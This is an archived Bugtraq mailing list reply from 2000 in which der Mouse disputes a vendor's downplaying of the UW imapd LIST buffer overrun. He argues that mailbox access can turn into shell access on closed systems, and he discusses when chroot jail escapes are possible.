Bugtraq mailing list archives
Re: response to the bugtraq report of buffer overruns in imapd LIST command
From: mouse () RODENTS MONTREAL QC CA (der Mouse)
Date: Tue, 18 Apr 2000 02:19:56 -0400
Can we please [] discuss the facts rationally?
1) There is no added vulnerability at all for a UNIX system which permits shell access.
This is not quite true. There is no added vulnerability for a system which permits shell access with the same <originating host, password> pair which gives mailbox access. One site I know of, for example, is considering nuking all ways to log in from offsite with a reusable password - but you can still do that for mail, and you can still get a shell with (eg) ssh.
I don't have sufficient data to know what percentage of UW imapd sites run IMAP servers on top of shell UNIX systems as opposed to closed systems.
Then it seems to me that you should assume "most damage", which in this case means that you should assume that a significant number of them *are* such that this is a real problem for them.
2) The impact of the problem is that an authorized user may obtain unauthorized shell access to a closed system.
More specifically, mailbox access may be leveraged into shell access. I gave one plausible example above where they are not normally equivalent. A "closed system" (in the sense of one which doesn't normally offer shell access to vanilla users at all) is another. A third might be one where email and shell access both exist, but the password databases for them are different.
Unless the system also has other, more severe, security problems, the consequences are modest and it is not difficult to identify the perpetrator.
I'll thank you to let *me* determine how severe such a consequence is for my system, thankyouverymuch.
Last but not least, I am very interested in Kris Kennaway's claim that "It may also be possible to break out of the chroot jail on some platforms." If true, it represents a huge root-level security hole on those platforms. I simply do not believe the claim. I would like to know if there is some substance to this claim, or if it was mere speculation.
Once you're running as root, it borders on trivial to break out of a chroot jail on many (most? all?) platforms. Getting to root in the first place is the interesting part. Depending on the OS and perhaps on what's in the jail, this can be anywhere from trivial to impossible.... If there's a way to break out of a chroot jail *without* first managing to end up running as root, I really want to see it. (On a system that restricts chroot() to root, of course.) der Mouse mouse () rodents montreal qc ca 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
Current thread:
- Re: response to the bugtraq report of buffer overruns in imapd LIST command der Mouse (Apr 17)
- <Possible follow-ups>
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Darren Moffat - Solaris Sustaining Engineering (Apr 18)